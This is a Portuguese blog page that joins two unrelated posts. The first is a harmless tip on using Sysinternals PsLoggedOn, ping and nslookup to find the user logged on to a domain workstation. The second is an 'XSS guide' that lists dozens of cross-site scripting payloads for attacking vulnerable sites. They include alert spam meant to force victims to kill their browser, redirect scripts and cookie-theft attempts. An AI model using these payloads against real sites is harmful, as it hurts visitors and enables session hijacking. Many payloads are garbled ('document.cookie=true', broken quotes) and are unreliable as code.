Como descobrir o usuário logado em uma estação

Dica do meu amigo Tiago Souza

Introdução

 O Psloggedon é um utilitário da sysinternals que mostra o usuário logado em uma estação de trabalho do domínio active directory.

Conteúdo

Vamos mostrar uma prática comum no dia a dia. Precisamos verificar se um endereço de IP está sendo usado no momento, para isso executamos o PING no endereço. Exemplo, vamos pingar o endereço IP 192.168.112.170.

Já que respondeu vamos descobrir agora qual o nome DNS desse computador no domínio executando nslookup.

Agora vamos mais a fundo, quem será que está logado nessa estação de trabalho? Para isso vamos utilizar oPSLOGGEDON.

Você vai ter que executar o download da ferramenta, que é bem leve (1.60MB), para isso visite:http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx  .

Depois é só executa-la uma vez e acessar o cmd para trabalhar com o comando. Estou usando o powershell por costume, mas pode ser o prompt de comando, que alguns chamam de DOS. :)

Baseado no número do computador que queremos descobrir o usuário logado digitamos:

Psloggedon nome_computador -l -x

Vejamos o help do aplicativo para entender melhor.

O que fizemos foi buscar quem está logado localmente sem mostrar a opção logon times (que pode trazer informações desnecessárias).

Esse é o método mais prático, mas se você precisa buscar pelo nome de usuário também é possivel digitando:

Psloggedon nome_usuario -l -x

Note que você tem que ter permissão nas máquinas do domínio para executar essa operação, algumas ele pode não abrir, mas veja que ele conseguiu descobrir a máquina “TIAGO”.

Se você não usar a opção “–l” ele busca logins remotos também.

Conclusão

Essa é uma ferramenta muito útil que ajuda o administrador de sistemas a encontrar em que computador os usuários do domínio estão logados.

XSS – Guia de Filtros e exemplos de Ataques

Nesta seção, vamos olhar para uma série de filtros e exemplos de XSS (Cross Site Scripting) ataques destinados a sites e penetração com vulnerabilidades XSS, espero que possa ajudar e dar ideias. Mensagem de alerta XSS Com esse código, uma mensagem de aviso será gerada em toda a página vulnerável, a mensagem é modificada:

  1. <script>alert(“XSS”);</script>  
  1. <IMG SRC=“javascript:alert(‘XSS’);”>
  1. <IMG SRC=javascript:alert(‘XSS’)>  
  1. <IMG SRC=JaVaScRiPt:alert(‘XSS’)> 
  1. <IMG SRC=javascript:alert(“XSS”)>  
  1. <IMG SRC=`javascript:alert(“RM’XSS'”)`>
  1. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>>  
  1. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”   javascript:alert(‘XSS’);”> 
  1. <IMG SRC=“javascript:alert(‘XSS’)”>  
  1. <IMG DYNSRC=“javascript:alert(‘XSS’)”>  
  1. <IMG LOWSRC=“javascript:alert(‘XSS’)”> 
  1. <IMG SRC=‘vbscript:msgbox(“XSS”)’>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029”>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“width: expression(alert(‘XSS’));”>  
  1. <BODY BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <BODY ONLOAD=alert(‘XSS’)>  
  1. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>  
  1. <TABLE BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <TABLE><TD BACKGROUND=“javascript:alert(‘XSS’)”>  

Uma maneira simples de tocar o nariz para os usuários é de alertas de pontuação intermináveis. Isso vai forçá-los a matar o processo do navegador, por ter muitas abas. Se isso acontece no meio de uma transação ou outro momento importante de navegação pode ser desastroso para o usuário, este método é mais eficaz no livro de visitas ou fóruns vulnerável:

Redirecionamento XSS Para realizar um redirecionamento e fazer um site inacessível, podemos tentar usar document.location, window.location, location.replace location.assign e todos geram o mesmo resultado de redirecionamento:

  1. <script>document.location.href = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>window.location = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>location.assign(“”http://mundotecnologico.net/””);</script>  
  1. <script>location.replace(“http://mundotecnologico.net/”);</script>  

Robo de Cookie e Sessão A través da propiedad document.cookie podemos sacar o cookie que está utilizando o usuario:

  1. <script language=“javascript”>alert(“XSS Cookie: ” + document.cookie);</script  
  1. <IMG SRC=“javascript:document.cookie=true;”>  
  1. <IMG DYNSRC=“javascript:document.cookie=true;”>  
  1. <IMG LOWSRC=“javascript:document.cookie=true;”>  
  1. <IMG STYLE=“CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”>  
  1. <BODY BACKGROUND=“javascript:document.cookie=true;”>  
  1. <BODY ONLOAD=document.cookie=true;>  
  1. <BGSOUND SRC=“javascript:document.cookie=true;”>  
  1. <BR SIZE=“&{document.cookie=true}”>  
  1. <LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”>  
  1. <TABLE BACKGROUND=“javascript:document.cookie=true;”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“width: expression(document.cookie=true);”>  
  1. <STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE>  
  1. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true“);}</STYLE><A CLASS=CrossSiteScripting></A>  
  1. <STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true“)}</STYLE>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <div onmouseover=“document.cookie=true;”>  
  1. <div style=“background-image: url(javascript:document.cookie=true;);”>  
  1. <div style=“width: expression(document.cookie=true;);”>  
  1. <body onload=“document.cookie=true;”>  
  1. <iframe src=”javascript:document.cookie=true;>  

Caso queira um documento com muitos outros comandos, veja abaixo:

XSS_Extra